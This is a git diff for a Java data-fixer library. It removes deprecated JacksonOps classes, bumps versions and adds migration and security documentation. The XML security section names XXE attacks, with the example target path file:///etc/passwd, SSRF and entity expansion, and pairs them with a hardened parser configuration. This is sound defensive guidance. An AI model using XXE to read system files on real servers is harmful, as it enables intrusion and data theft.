- * - * @param entries the stream of key-value pairs; must not be {@code null} - * @return a new {@link ObjectNode} containing all valid entries from the stream - */ - @NotNull - @Override - public JsonNode createMap(@NotNull final Stream> entries) { - Preconditions.checkNotNull(entries, "entries must not be null"); - return this.baseOps.createMap(entries); - } - - /** - * {@inheritDoc} - * - *

Extracts the entries of a JSON object as a stream of key-value pairs. - * This delegates to the underlying - * {@link JacksonJsonOps#getMapEntries(JsonNode)} method.

- *
- * @param input the JSON node to extract entries from; must not be {@code null}
- * @return a {@link DataResult} containing a stream of key-value pairs on success,
- * or an error if the input is not an object node
- */
- @NotNull
- @Override
- public DataResult<Stream<Pair<JsonNode, JsonNode>>> getMapEntries(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getMapEntries(input);
- }
-
- /**
- * {@inheritDoc}
- *
- * <p>
- * Creates a new JSON object by adding a key-value pair to an existing map.
- * A deep copy of the input map is created with the new entry added.
- * This delegates to the underlying
- * {@link JacksonJsonOps#mergeToMap(JsonNode, JsonNode, JsonNode)} method.
- *
- * @param map the existing JSON object; must not be {@code null}
- * @param key the key for the new entry (must be a text node); must not be {@code null}
- * @param value the value for the new entry; must not be {@code null}
- * @return a {@link DataResult} containing the new object with the added entry on success,
- * or an error if the map is not an object node or the key is not a text node
- */
- @NotNull
- @Override
- public DataResult<JsonNode> mergeToMap(@NotNull final JsonNode map, @NotNull final JsonNode key, @NotNull final JsonNode value) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.mergeToMap(map, key, value);
- }
-
- /**
- * {@inheritDoc}
- *
- * <p>
- * Creates a new JSON object by merging two maps together.
- * A deep copy of the first map is created, and all entries from the second map are added.
- * Entries in the second map override entries with the same key in the first map.
- * This delegates to the underlying
- * {@link JacksonJsonOps#mergeToMap(JsonNode, JsonNode)} method.
- *
- * @param map the base JSON object; must not be {@code null}
- * @param other the JSON object to merge from; must not be {@code null}
- * @return a {@link DataResult} containing the merged object on success,
- * or an error if either argument is not an object node
- */
- @NotNull
- @Override
- public DataResult<JsonNode> mergeToMap(@NotNull final JsonNode map, @NotNull final JsonNode other) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(other, "other must not be null");
- return this.baseOps.mergeToMap(map, other);
- }
-
- // ==================== Conversion ====================
-
- /**
- * {@inheritDoc}
- *
- * <p>
- * Converts data from another {@link DynamicOps} format to Jackson's {@link JsonNode}.
- * Recursively converts primitives, lists, and maps to their Jackson equivalents.
- * This delegates to the underlying
- * {@link JacksonJsonOps#convertTo(DynamicOps, Object)} method.
- *
- * @param <U> the type parameter of the target format
- * @param ops the target {@link DynamicOps} implementation; must not be {@code null}
- * @param input the data to convert in the source format; must not be {@code null}
- * @return the converted data as a Jackson {@link JsonNode}
- */
- @NotNull
- @Override
- public <U> JsonNode convertTo(@NotNull final DynamicOps<U> ops, @NotNull final U input) {
- Preconditions.checkNotNull(ops, "ops must not be null");
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.convertTo(ops, input);
- }
-
- /**
- * Returns a string representation of this deprecated wrapper.
- *
- * <p>
- * The returned string clearly indicates that this is a deprecated wrapper
- * class and suggests using the new implementation instead.
- * - * @return a descriptive string indicating deprecated status and the recommended alternative - */ - @Override - public String toString() { - return "JacksonOps (deprecated, use JacksonJsonOps)"; - } -} diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java deleted file mode 100644 index 73a5b8f..0000000 --- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java +++ /dev/null @@ -1,135 +0,0 @@ -/* - * Copyright (c) 2025 Splatgames.de Software and Contributors - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - * SOFTWARE. - */ - -/** - * DEPRECATED: Legacy package for Jackson-based {@link de.splatgames.aether.datafixers.api.dynamic.DynamicOps} - * implementation. This package is retained only for backwards compatibility and will be removed in version 1.0.0. - * - *
- * <p>
- * This package contains the original {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps} class
- * from the pre-0.4.0 package structure. All classes in this package are deprecated and delegate to their
- * replacements in the reorganized {@link de.splatgames.aether.datafixers.codec.json.jackson} package.
- *
- * <h2>Migration Guide</h2>
- *
- * <p>
- * To migrate from this deprecated package to the new package structure:
- *
- * <h3>Import Changes</h3>
- *
- * <pre>{@code
- * // Old imports (deprecated, will be removed in 1.0.0)
- * import de.splatgames.aether.datafixers.codec.jackson.JacksonOps;
- *
- * // New imports (recommended)
- * import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
- * }</pre>
- *
- * <h3>Code Changes</h3>
- *
- * <p>
- * The class has been renamed from {@code JacksonOps} to {@code JacksonJsonOps} for clarity:
- *
- * <pre>{@code
- * // Old code (deprecated)
- * JacksonOps ops = JacksonOps.INSTANCE;
- * JacksonOps customOps = new JacksonOps(customMapper);
- * Dynamic<JsonNode> dynamic = new Dynamic<>(ops, jsonNode);
- *
- * // New code (recommended)
- * JacksonJsonOps ops = JacksonJsonOps.INSTANCE;
- * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
- * Dynamic<JsonNode> dynamic = new Dynamic<>(ops, jsonNode);
- * }</pre>
- *
- * <h2>Deprecation Timeline</h2>
- *
- * <table>
- *   <caption>Deprecation and Removal Schedule</caption>
- *   <tr><th>Version</th><th>Status</th><th>Action Required</th></tr>
- *   <tr><td>0.4.0</td><td>Deprecated</td><td>Update imports and class names; old code continues to work</td></tr>
- *   <tr><td>0.5.0</td><td>Deprecated</td><td>Warnings during compilation; functionality unchanged</td></tr>
- *   <tr><td>1.0.0</td><td>Removed</td><td>Package deleted; migration required before upgrade</td></tr>
- * </table>
- *
- * <h2>Why This Change?</h2>
- *
- * <p>
- * The package reorganization in version 0.4.0 introduced a cleaner, more scalable structure:
- *
- * <ul>
- *   <li>Format-Based Organization: All JSON implementations are now grouped under
- *       {@code codec.json.*}, YAML under {@code codec.yaml.*}, etc.</li>
- *   <li>Library-Based Subpackages: Each format has subpackages for different
- *       libraries (e.g., {@code json.gson}, {@code json.jackson})</li>
- *   <li>Disambiguated Naming: {@code JacksonOps} is now {@code JacksonJsonOps} to
- *       distinguish it from {@code JacksonYamlOps}, {@code JacksonTomlOps}, and {@code JacksonXmlOps}</li>
- * </ul>
- *
- * <h2>New Package Structure</h2>
- *
- * <pre>
- * de.splatgames.aether.datafixers.codec
- * ├── json
- * │   ├── gson/GsonOps.java
- * │   └── jackson/JacksonJsonOps.java   (renamed from JacksonOps)
- * ├── yaml
- * │   ├── jackson/JacksonYamlOps.java   (new)
- * │   └── snakeyaml/SnakeYamlOps.java   (new)
- * ├── toml
- * │   └── jackson/JacksonTomlOps.java   (new)
- * └── xml
- *     └── jackson/JacksonXmlOps.java    (new)
- * </pre>
- *
- * <h2>Class Mapping</h2>
- *
- * <table>
- *   <caption>Old to New Class Mapping</caption>
- *   <tr><th>Old Class (Deprecated)</th><th>New Class (Recommended)</th></tr>
- *   <tr><td>{@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps}</td>
- *       <td>{@link de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps}</td></tr>
- *   <tr><td>{@code JacksonOps.INSTANCE}</td>
- *       <td>{@link de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps#INSTANCE}</td></tr>
- *   <tr><td>{@code new JacksonOps(mapper)}</td>
- *       <td>{@code new JacksonJsonOps(mapper)}</td></tr>
- * </table>
- *
- * <h2>Delegation Pattern</h2>
- *
- * <p>
- * The deprecated {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps} class uses the
- * delegation pattern to forward all method calls to the new
- * {@link de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps} implementation. This ensures:
- *
- * <ul>
- *   <li>Identical behavior between deprecated and new implementations</li>
- *   <li>Bug fixes applied to the new implementation automatically benefit deprecated users</li>
- *   <li>No performance overhead beyond a single method delegation</li>
- * </ul>
- *
- * <h2>Thread Safety</h2>
- *
- * <p>
- * All classes in this deprecated package maintain the same thread-safety guarantees as their
- * replacements. The singleton {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps#INSTANCE}
- * can be safely shared across multiple threads. Custom instances created with a custom
- * {@link com.fasterxml.jackson.databind.ObjectMapper} are thread-safe if the provided mapper is thread-safe.
- * - * @author Erik Pförtner - * @see de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps - * @see de.splatgames.aether.datafixers.codec.json - * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps - * @since 0.1.0 - * @deprecated Since 0.4.0. Use classes from {@link de.splatgames.aether.datafixers.codec.json.jackson} - * instead. This package will be removed in version 1.0.0. - */ -@Deprecated(since = "0.4.0", forRemoval = true) -package de.splatgames.aether.datafixers.codec.jackson; diff --git a/aether-datafixers-core/pom.xml b/aether-datafixers-core/pom.xml index e01a286..76d216d 100644 --- a/aether-datafixers-core/pom.xml +++ b/aether-datafixers-core/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-core diff --git a/aether-datafixers-examples/pom.xml b/aether-datafixers-examples/pom.xml index aaf7610..23d7faa 100644 --- a/aether-datafixers-examples/pom.xml +++ b/aether-datafixers-examples/pom.xml @@ -7,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-examples @@ -56,7 +56,7 @@ org.codehaus.mojo exec-maven-plugin - 3.1.0 + 3.6.3 de.splatgames.aether.datafixers.examples.game.GameExample diff --git a/aether-datafixers-functional-tests/pom.xml b/aether-datafixers-functional-tests/pom.xml index 9c0208c..4f4e7a3 100644 --- a/aether-datafixers-functional-tests/pom.xml +++ b/aether-datafixers-functional-tests/pom.xml @@ -1,25 +1,4 @@ - @@ -28,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-functional-tests @@ -44,7 +23,7 @@ true - 3.4.1 + 3.5.10 diff --git a/aether-datafixers-schema-tools/pom.xml b/aether-datafixers-schema-tools/pom.xml index bab6ea2..ce4fc1e 100644 --- a/aether-datafixers-schema-tools/pom.xml +++ b/aether-datafixers-schema-tools/pom.xml @@ -7,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-schema-tools diff --git a/aether-datafixers-spring-boot-starter/pom.xml b/aether-datafixers-spring-boot-starter/pom.xml index 4443770..122dc22 100644 --- a/aether-datafixers-spring-boot-starter/pom.xml +++ b/aether-datafixers-spring-boot-starter/pom.xml @@ -7,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-spring-boot-starter @@ -18,7 +18,7 @@ DynamicOps integration, MigrationService with fluent API, and Actuator endpoints. - 3.4.1 + 3.5.10 diff --git a/aether-datafixers-testkit/pom.xml b/aether-datafixers-testkit/pom.xml index 98f4b67..dde9eb2 100644 --- a/aether-datafixers-testkit/pom.xml +++ b/aether-datafixers-testkit/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-testkit @@ -54,7 +54,7 @@ gson - + com.fasterxml.jackson.core jackson-databind diff --git a/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java b/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java index f67c78b..e5acf4c 100644 --- a/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java +++ b/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java @@ -139,21 +139,6 @@ public static TestDataBuilder gson() { return new TestDataBuilder<>(GsonOps.INSTANCE); } - /** - * Creates a builder using {@link JacksonJsonOps}. - * - *
- * <p>
- * Use this when testing with Jackson's JSON representation.
- * - * @return a new {@link TestDataBuilder} for Jackson JSON - * @deprecated Since 0.5.0. Use {@link #jacksonJson()} instead for explicit format naming. - * This method will be removed in version 1.0.0. - */ - @Deprecated(forRemoval = true, since = "0.5.0") - @NotNull - public static TestDataBuilder jackson() { - return jacksonJson(); - } - /** * Creates a builder using {@link JacksonJsonOps}. * diff --git a/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java b/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java index 7f03785..04dd795 100644 --- a/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java +++ b/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java @@ -264,17 +264,6 @@ void jacksonJsonCreatesJacksonJsonBuilder() { assertThat(dynamic.ops()).isSameAs(JacksonJsonOps.INSTANCE); } - @Test - @DisplayName("jackson() creates Jackson JSON builder (deprecated)") - @SuppressWarnings("deprecation") - void jacksonCreatesJacksonJsonBuilder() { - final Dynamic dynamic = TestData.jackson().object() - .put("key", "value") - .build(); - - assertThat(dynamic.get("key").asString().result()).hasValue("value"); - } - @Test @DisplayName("snakeYaml() creates SnakeYAML builder") void snakeYamlCreatesSnakeYamlBuilder() { diff --git a/docs/README.md b/docs/README.md index 482fbf0..56077c0 100644 --- a/docs/README.md +++ b/docs/README.md @@ -123,6 +123,16 @@ For experienced users: - [Performance Optimization](advanced/performance-optimization.md) - [Extending the Framework](advanced/extending-framework.md) +### Security + +Guidance for processing untrusted data safely: + +- [Security Overview](security/index.md) — Introduction to security considerations +- [Threat Model](security/threat-model.md) — Attack vectors and trust boundaries +- [Format Security](security/format-considerations/index.md) — Per-format security guidance +- [Best Practices](security/best-practices.md) — Secure configuration patterns +- [Secure Configuration Examples](security/secure-configuration-examples.md) — Ready-to-use examples + ### Spring Boot Integration Seamlessly integrate Aether Datafixers into Spring Boot applications: @@ -138,6 +148,7 @@ Seamlessly integrate Aether Datafixers into Spring Boot applications: ### Support - [Troubleshooting](troubleshooting/index.md) +- [Migration Guide](migration/index.md) - [Common Errors](troubleshooting/common-errors.md) - [FAQ](troubleshooting/faq.md) - [Glossary](appendix/glossary.md) diff --git a/docs/appendix/glossary.md b/docs/appendix/glossary.md index 5bb793f..2f2af82 100644 --- a/docs/appendix/glossary.md +++ b/docs/appendix/glossary.md @@ -140,7 +140,7 @@ Terminology used in Aether Datafixers. : Test harness for validating Schema configurations. **TestData** -: Entry point for fluent test data builders (TestData.gson(), TestData.jackson()). +: Entry point for fluent test data builders (TestData.gson(), TestData.jacksonJson()). **TestDataBuilder** : Fluent builder for creating Dynamic objects with fields. diff --git a/docs/codec/xml.md b/docs/codec/xml.md index c50d77c..35e14cd 100644 --- a/docs/codec/xml.md +++ b/docs/codec/xml.md @@ -338,6 +338,38 @@ DataResult result = ServerConfig.CODEC.decode(JacksonXmlOps.INSTAN ServerConfig config = result.getOrThrow(); ``` +## Security Considerations + +> **WARNING:** XML processing is vulnerable to **XXE (XML External Entity)** attacks. 
+> When processing untrusted XML, you **MUST** configure the `XmlMapper` to disable +> external entity processing. + +**XXE attacks can:** +- Read local files (`file:///etc/passwd`) +- Perform Server-Side Request Forgery (SSRF) +- Cause Denial of Service through entity expansion (Billion Laughs) + +**Secure configuration for untrusted XML:** + +```java +XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory(); +xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); +xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); +xmlInputFactory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false); + +XmlMapper secureMapper = XmlMapper.builder( + XmlFactory.builder() + .xmlInputFactory(xmlInputFactory) + .build() +).build(); + +JacksonXmlOps secureOps = new JacksonXmlOps(secureMapper); +``` + +For detailed security guidance and configuration examples, see [Jackson XML Security](../security/format-considerations/jackson.md#xxe-prevention). + +--- + ## Best Practices 1. **Use Simple Structures** - Jackson XML works best with simple, well-structured XML diff --git a/docs/codec/yaml.md b/docs/codec/yaml.md index 33f997f..3ef29e4 100644 --- a/docs/codec/yaml.md +++ b/docs/codec/yaml.md @@ -132,6 +132,32 @@ Yaml yaml = new Yaml(new SafeConstructor(loaderOptions)); Object data = yaml.load(untrustedYaml); ``` +## Security Considerations + +> **WARNING:** When loading YAML from untrusted sources, you **MUST** use `SafeConstructor` +> to prevent arbitrary code execution attacks. The default `Yaml()` constructor allows +> instantiation of arbitrary Java classes, which can lead to **Remote Code Execution (RCE)**. + +**Critical security measures for untrusted YAML:** + +1. **Always use `SafeConstructor`** — Prevents arbitrary class instantiation +2. **Limit alias expansion** — Set `maxAliasesForCollections` to prevent Billion Laughs attacks +3. **Limit nesting depth** — Set `nestingDepthLimit` to prevent stack overflow +4. **Limit input size** — Set `codePointLimit` to prevent memory exhaustion + +```java +// Secure configuration for untrusted YAML +LoaderOptions options = new LoaderOptions(); +options.setMaxAliasesForCollections(50); +options.setNestingDepthLimit(50); +options.setCodePointLimit(3 * 1024 * 1024); +options.setAllowDuplicateKeys(false); + +Yaml safeYaml = new Yaml(new SafeConstructor(options)); +``` + +For detailed security guidance, see [SnakeYAML Security](../security/format-considerations/snakeyaml.md). + ### Data Types SnakeYamlOps works with native Java types: diff --git a/docs/migration/index.md b/docs/migration/index.md new file mode 100644 index 0000000..eccbd6d --- /dev/null +++ b/docs/migration/index.md @@ -0,0 +1,25 @@ +# Migration Guides + +This section contains guides for upgrading between major versions of Aether Datafixers. + +## Available Guides + +| From | To | Guide | +|--------|--------|------------------------------------| +| v0.5.x | v1.0.0 | [Migration Guide](v0.5-to-v1.0.md) | + +## Before You Migrate + +1. **Back up your project** — Create a commit or backup before starting +2. **Read the full guide** — Understand all changes before making modifications +3. **Update dependencies first** — Ensure your build file references the new version +4. **Run tests after** — Verify your migrations still work correctly + +## General Migration Strategy + +1. Update the version in your build file (`pom.xml` or `build.gradle`) +2. Attempt to compile — note all compilation errors +3. 
Apply automated migration patterns from the guide +4. Fix any remaining issues manually +5. Run your test suite +6. Enable deprecation warnings to catch deprecated API usage diff --git a/docs/migration/v0.5-to-v1.0.md b/docs/migration/v0.5-to-v1.0.md new file mode 100644 index 0000000..c1199e3 --- /dev/null +++ b/docs/migration/v0.5-to-v1.0.md @@ -0,0 +1,348 @@ +# Migration Guide: v0.5.x to v1.0.0 + +This guide helps you migrate your project from Aether Datafixers v0.5.x to v1.0.0. It covers breaking changes, step-by-step migration instructions, and automated migration patterns. + +## Overview + +Version 1.0.0 introduces breaking changes to improve the codec package organization and API clarity. This guide will help you update your codebase with minimal effort. + +| Change Type | Component | Impact | +|-----------------|-------------------------|---------------------------------------------------| +| **Breaking** | Codec package structure | Import statements must be updated | +| **Breaking** | `JacksonOps` rename | Class renamed to `JacksonJsonOps` | +| **Breaking** | `TestData.jackson()` | Method renamed to `TestData.jacksonJson()` | +| **Deprecation** | Rules traversal methods | Single-argument overloads deprecated (still work) | + +--- + +## Breaking Changes + +### 1. Codec Package Restructuring + +The codec module has been reorganized to better reflect the supported formats (JSON, YAML, TOML, XML). + +**Before (v0.5.x):** +```java +import de.splatgames.aether.datafixers.codec.gson.GsonOps; +import de.splatgames.aether.datafixers.codec.jackson.JacksonOps; +``` + +**After (v1.0.0):** +```java +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; +``` + +**Rationale:** The new package structure groups implementations by format type (`json`, `yaml`, `toml`, `xml`) rather than by library. This makes it easier to discover all available JSON implementations and aligns with the YAML/TOML/XML naming conventions. + +**Complete Package Mapping:** + +| Old Package (v0.5.x) | New Package (v1.0.0) | +|----------------------------|-------------------------------------| +| `codec.gson.GsonOps` | `codec.json.gson.GsonOps` | +| `codec.jackson.JacksonOps` | `codec.json.jackson.JacksonJsonOps` | + +### 2. JacksonOps Class Rename + +The `JacksonOps` class has been renamed to `JacksonJsonOps` to distinguish it from other Jackson-based implementations. + +**Before (v0.5.x):** +```java +Dynamic dynamic = new Dynamic<>(JacksonOps.INSTANCE, jsonNode); +``` + +**After (v1.0.0):** +```java +Dynamic dynamic = new Dynamic<>(JacksonJsonOps.INSTANCE, jsonNode); +``` + +**Rationale:** With the introduction of `JacksonYamlOps`, `JacksonTomlOps`, and `JacksonXmlOps`, the generic name `JacksonOps` was ambiguous. The suffix `JsonOps` makes it clear which format is being used. + +### 3. TestData Method Rename + +The `TestData.jackson()` method has been renamed to `TestData.jacksonJson()`. + +**Before (v0.5.x):** +```java +Dynamic testData = TestData.jackson() + .put("name", "Alice") + .put("level", 42) + .build(); +``` + +**After (v1.0.0):** +```java +Dynamic testData = TestData.jacksonJson() + .put("name", "Alice") + .put("level", 42) + .build(); +``` + +**Rationale:** Consistency with `jacksonYaml()`, `jacksonToml()`, and `jacksonXml()` methods. + +--- + +## Deprecations (Non-Breaking) + +### Rules Traversal Methods + +The single-argument overloads of traversal methods are deprecated but **not removed**. 
Your code will still compile and run, but you'll see deprecation warnings. + +**Deprecated Methods:** +- `Rules.all(rule)` — use `Rules.all(ops, rule)` +- `Rules.one(rule)` — use `Rules.one(ops, rule)` +- `Rules.everywhere(rule)` — use `Rules.everywhere(ops, rule)` +- `Rules.bottomUp(rule)` — use `Rules.bottomUp(ops, rule)` +- `Rules.topDown(rule)` — use `Rules.topDown(ops, rule)` + +**Why migrate?** The deprecated methods are **no-ops** that don't actually traverse children. They exist only for API compatibility. To get proper child traversal behavior, you must provide a `DynamicOps` instance. + +**Before (deprecated):** +```java +TypeRewriteRule rule = Rules.everywhere( + Rules.renameField("player", "name", "username") +); +``` + +**After (recommended):** +```java +TypeRewriteRule rule = Rules.everywhere(GsonOps.INSTANCE, + Rules.renameField("player", "name", "username") +); +``` + +--- + +## Automated Migration + +### IntelliJ IDEA (Regex Search & Replace) + +Use **Edit → Find → Replace in Files** (Ctrl+Shift+R / Cmd+Shift+R) with **Regex** enabled. + +#### GsonOps Import +- **Find:** `import de\.splatgames\.aether\.datafixers\.codec\.gson\.GsonOps;` +- **Replace:** `import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;` + +#### JacksonOps Import and Class Name +- **Find:** `import de\.splatgames\.aether\.datafixers\.codec\.jackson\.JacksonOps;` +- **Replace:** `import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;` + +Then replace all usages: +- **Find:** `JacksonOps\.INSTANCE` +- **Replace:** `JacksonJsonOps.INSTANCE` + +And the type reference: +- **Find:** `JacksonOps(?!Json)` +- **Replace:** `JacksonJsonOps` + +#### TestData.jackson() +- **Find:** `TestData\.jackson\(\)` +- **Replace:** `TestData.jacksonJson()` + +#### Rules Methods (Optional - for deprecation cleanup) +- **Find:** `Rules\.(all|one|everywhere|bottomUp|topDown)\((?!.*DynamicOps)(\w+)\)` +- **Replace:** `Rules.$1(GsonOps.INSTANCE, $2)` + +**Note:** The Rules regex assumes you want to use `GsonOps.INSTANCE`. Adjust the replacement if you use a different `DynamicOps` implementation. + +--- + +### VS Code (Regex Search & Replace) + +Use **Edit → Replace in Files** (Ctrl+Shift+H / Cmd+Shift+H) with **Regex** enabled (Alt+R). + +The same patterns work in VS Code: + +| Find | Replace | +|--------------------------------------------------------------------------|-----------------------------------------------------------------------------| +| `import de\.splatgames\.aether\.datafixers\.codec\.gson\.GsonOps;` | `import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;` | +| `import de\.splatgames\.aether\.datafixers\.codec\.jackson\.JacksonOps;` | `import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;` | +| `JacksonOps\.INSTANCE` | `JacksonJsonOps.INSTANCE` | +| `TestData\.jackson\(\)` | `TestData.jacksonJson()` | + +--- + +### Command Line (sed) + +For batch migration across multiple files: + +```bash +# GsonOps import +find . -name "*.java" -exec sed -i 's/import de\.splatgames\.aether\.datafixers\.codec\.gson\.GsonOps;/import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;/g' {} + + +# JacksonOps import +find . -name "*.java" -exec sed -i 's/import de\.splatgames\.aether\.datafixers\.codec\.jackson\.JacksonOps;/import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;/g' {} + + +# JacksonOps class name +find . -name "*.java" -exec sed -i 's/JacksonOps\.INSTANCE/JacksonJsonOps.INSTANCE/g' {} + +find . 
-name "*.java" -exec sed -i 's/JacksonOps\([^J]\)/JacksonJsonOps\1/g' {} + + +# TestData.jackson() +find . -name "*.java" -exec sed -i 's/TestData\.jackson()/TestData.jacksonJson()/g' {} + +``` + +**macOS Note:** Use `sed -i ''` instead of `sed -i` on macOS. + +--- + +### PowerShell (Windows) + +```powershell +# GsonOps import +Get-ChildItem -Recurse -Filter *.java | ForEach-Object { + (Get-Content $_.FullName) -replace 'import de\.splatgames\.aether\.datafixers\.codec\.gson\.GsonOps;', 'import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;' | Set-Content $_.FullName +} + +# JacksonOps import +Get-ChildItem -Recurse -Filter *.java | ForEach-Object { + (Get-Content $_.FullName) -replace 'import de\.splatgames\.aether\.datafixers\.codec\.jackson\.JacksonOps;', 'import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;' | Set-Content $_.FullName +} + +# JacksonOps class name +Get-ChildItem -Recurse -Filter *.java | ForEach-Object { + (Get-Content $_.FullName) -replace 'JacksonOps\.INSTANCE', 'JacksonJsonOps.INSTANCE' | Set-Content $_.FullName +} + +# TestData.jackson() +Get-ChildItem -Recurse -Filter *.java | ForEach-Object { + (Get-Content $_.FullName) -replace 'TestData\.jackson\(\)', 'TestData.jacksonJson()' | Set-Content $_.FullName +} +``` + +--- + +## Verification + +### Step 1: Compile-Time Verification + +After applying the migrations, rebuild your project: + +```bash +mvn clean compile +``` + +or + +```bash +./gradlew clean compileJava +``` + +**Expected:** No compilation errors. If you see import errors, you may have missed some files. + +### Step 2: Check for Deprecation Warnings + +Enable deprecation warnings to identify remaining deprecated API usage: + +**Maven:** +```xml + + org.apache.maven.plugins + maven-compiler-plugin + + + -Xlint:deprecation + + + +``` + +**Gradle:** +```groovy +tasks.withType(JavaCompile) { + options.compilerArgs << "-Xlint:deprecation" +} +``` + +Look for warnings like: +``` +warning: [deprecation] all(TypeRewriteRule) in Rules has been deprecated +``` + +These indicate deprecated `Rules` methods that should be updated to include `DynamicOps`. + +### Step 3: Run Tests + +Execute your test suite to verify runtime behavior: + +```bash +mvn test +``` + +or + +```bash +./gradlew test +``` + +### Step 4: Manual Spot Check + +Verify critical migration paths in your application: + +1. Load sample data from v0.5.x +2. Run migrations through your `DataFixer` +3. Verify output matches expected format +4. Check logs for any unexpected warnings + +--- + +## Troubleshooting + +### "Cannot resolve symbol 'JacksonOps'" + +You updated the import but not all usages of the class name. + +**Solution:** Replace `JacksonOps` with `JacksonJsonOps` throughout your code. + +### "Cannot resolve symbol 'GsonOps'" after migration + +Verify your import statement is: +```java +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +``` + +Not the old path: +```java +import de.splatgames.aether.datafixers.codec.gson.GsonOps; +``` + +### Rules not traversing children + +If your `Rules.everywhere()`, `Rules.topDown()`, or similar methods seem to not transform nested data, you're likely using the deprecated single-argument overload. + +**Solution:** Add a `DynamicOps` parameter: +```java +// Before (deprecated, doesn't traverse children) +Rules.everywhere(myRule) + +// After (correct behavior) +Rules.everywhere(GsonOps.INSTANCE, myRule) +``` + +### "TestData.jackson() not found" + +The method was renamed. 
+ +**Solution:** Replace `TestData.jackson()` with `TestData.jacksonJson()`. + +--- + +## Summary Checklist + +- [ ] Update `codec.gson.GsonOps` imports to `codec.json.gson.GsonOps` +- [ ] Update `codec.jackson.JacksonOps` imports to `codec.json.jackson.JacksonJsonOps` +- [ ] Replace `JacksonOps` class references with `JacksonJsonOps` +- [ ] Replace `TestData.jackson()` with `TestData.jacksonJson()` +- [ ] (Optional) Update deprecated `Rules` methods to include `DynamicOps` +- [ ] Rebuild and verify no compilation errors +- [ ] Run test suite +- [ ] Enable deprecation warnings and address remaining issues + +--- + +## Need Help? + +If you encounter issues during migration: + +- Check the [FAQ](../troubleshooting/faq.md) for common questions +- Review [Common Errors](../troubleshooting/common-errors.md) for error messages +- File an issue at [GitHub Issues](https://github.com/aether-framework/aether-datafixers/issues) diff --git a/docs/operations/debugging-guide.md b/docs/operations/debugging-guide.md new file mode 100644 index 0000000..ae8a0f6 --- /dev/null +++ b/docs/operations/debugging-guide.md @@ -0,0 +1,502 @@ +# Debugging Guide + +Systematic 